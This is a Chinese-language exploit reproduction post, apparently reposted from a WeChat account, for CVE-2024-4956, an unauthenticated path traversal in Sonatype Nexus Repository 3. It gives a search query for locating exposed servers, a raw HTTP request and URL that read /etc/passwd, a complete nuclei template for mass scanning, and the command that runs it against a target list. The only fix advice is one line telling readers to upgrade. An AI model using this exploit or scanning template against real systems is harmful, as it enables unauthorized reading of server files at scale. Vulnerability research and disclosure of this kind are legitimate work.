01
—
漏洞名称
02
—
漏洞影响
Sonatype Nexus Repository 3
03
—
漏洞描述
Sonatype Nexus Repository 是一个开源的仓库管理系统,在安装、配置、使用简单的基础上提供了更加丰富的功能。2024年5月,Sonatype官方发布安全公告,披露了 CVE-2024-4956 Nexus Repository 3 目录遍历与文件读取漏洞。攻击者可在无需登陆的情况下构造恶意请求读取遍历系统上的文件。
04
—
title
=
"Nexus Repository Manager"
05
—
漏洞复现
POC数据包
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/
1.1
Host: x.x.x.x
User-Agent: Mozilla/
5.0
(Windows NT
5.1
; rv:
21.0
) Gecko/
20100101
Firefox/
21.0
Connection:
close
Accept: *
/*
Accept-Language: en
Accept-Encoding: gzip
使用浏览器访问靶场
http
://x.x.x.x/
%2
F
%2
F
%2
F
%2
F
%2
F
%2
F
%2
F..
%2
F..
%2
F..
%2
F..
%2
F..
%2
F..
%2
F..
%2
Fetc
%2
Fpasswd
打开文件
漏洞复现成功
06
—
批量漏洞扫描 poc
nuclei poc文件内容如下
id
: CVE-2024-4956
info:
name: Sonatype Nexus Repository Manager
3
- Local File Inclusion
author: ritikchaddha
severity: high
description: |
Path Traversal in Sonatype Nexus Repository
3
allows an unauthenticated attacker to
read
system
files. Fixed in version
3.68
.
1
.
reference:
- https:
//x
.com/phithon_xg/status/
1793517567560335428
?
s
=
46
&t=GMMfJwV8rhJHdcj2TUympg
- https:
//nvd
.nist.gov/vuln/detail/CVE-
2024
-
4956
- https:
//support
.sonatype.com/hc/en-us/articles/
29416509323923
- https:
//github
.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:
3.1
/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score:
7.5
cve-id: CVE-
2024
-
4956
cwe-id: CWE-
22
epss-score:
0
.
00044
epss-percentile:
0
.
10128
cpe: cpe:
2.3
:a:sonatype:nexus:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request:
1
vendor: sonatype
product: nexus
fofa-query: title=
"Nexus Repository Manager"
tags: cve,cve2024,nexus,lfi
http:
- method: GET
path:
-
"{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers:
- type: dsl
dsl:
- regex(
'root:.*:0:0:'
, body)
- contains(header,
"application/octet-stream"
)
- status_code ==
200
condition:
and
# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950
运行POC
nuclei.exe -t CVE-
2024
-
4956
.yaml -l
2
.txt
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-4956漏洞复现(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论